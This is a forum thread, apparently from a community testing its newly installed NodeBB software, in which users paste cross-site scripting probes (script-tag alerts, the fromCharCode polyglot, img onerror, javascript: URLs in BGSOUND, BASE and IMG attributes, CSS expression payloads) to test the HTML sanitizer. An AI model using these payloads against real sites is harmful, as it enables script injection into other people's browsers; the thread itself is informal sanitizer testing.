JellyPotato (Warning, Should probably stay out.)



  • redacted - bz



  • @Matches


    redacted -bz

    Jelly



  • Now for some paging



  • Now for some paging



  • Now for some paging



  • redacted - bz



  • redacted - bz



  • redacted - bz




  • F
    F
    [omitted]



  • Dance for me <script>alert('Maybe')</script><scri%20pt>alert('idk')</script%><!--<script>alert('Maybe')</script-->>





  • XSS




  • <form action="" method="GET">
    <input id="query" name="query" value="Enter query here..." onfocus="this.value=''">
    <input id="button" type="submit" value="Search">

    </form>


  • <img src=x onerror="

    Hum @Matches"/>

    <img src=x onerror="

    .jpg' />

    <script>alert('testing')</script>

    <body> Hello {{ USERNAME }}, view your Account. <script> var id = {{ USER_ID }}; alert("Your user ID is: " + id); </script> </body>


  • ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--></S »
    CRIPT>">'><SCRIPT>alert(Stri »
    ng.fromCharCode(88,83,83))</ »
    SCRIPT>=&{}



  • <div '';!--"<XSS>=&{()}

    <BGSOUND »
    SRC="javascript:alert('XSS') »
    ;">

    <BASE » HREF="javascript:alert('XSS' » );//">


  • Locator
    ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--></S »
    CRIPT>">'><SCRIPT>alert(Stri »
    ng.fromCharCode(88,83,83))</ »
    SCRIPT>=&{}
    ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--> »
    ">'>=&{}
    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
    XSS Quick Test
    '';!--"<xss>=&{()}<br/> '';!--"=&{()}<br/> '';!--"=&{()}<br/> SCRIPT w/Alert()</xss>



  • Just so you know, the source code for the HTML sanitizer is here:



  • <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">

    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />

    IMG Lowsrc
    <IMG »
    LOWSRC="javascript:alert('XS »
    S');">
    IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />



  • What's the fun in that?
    @ben_lubar Something broke in the big block from http://htmlpurifier.org/live/smoketests/xssAttacks.php - trying to figure out which combination caused it.



  • IMG Dynsrc
    <IMG »
    DYNSRC="javascript:alert('XS »
    S');">
    IMG Lowsrc
    <IMG »
    LOWSRC="javascript:alert('XS »
    S');">
    IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />
    somecommand.php?somevariables=maliciousc





  • IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />
    somecommand.php?somevariables=maliciousc
    IMG STYLE w/expression
    exp/<XSS »
    STYLE='no\xss:noxss("
    //*"); »

    xss:ex/XSS/// »
    /pression(alert("XSS"))'>
    exp/*
    exp/*
    List-style-image

    <STYLE>li {list-style-image: » url("javascript:alert('XSS') » ");}</STYLE>
    • XSS
      • XSS


  • This post is deleted!


  • Well, it's been hours since we switched to NodeBB and no one has found any obvious XSS exploits. So that beats Discourse.



  • @anonymous234 no, @Maciejasjmj found one.

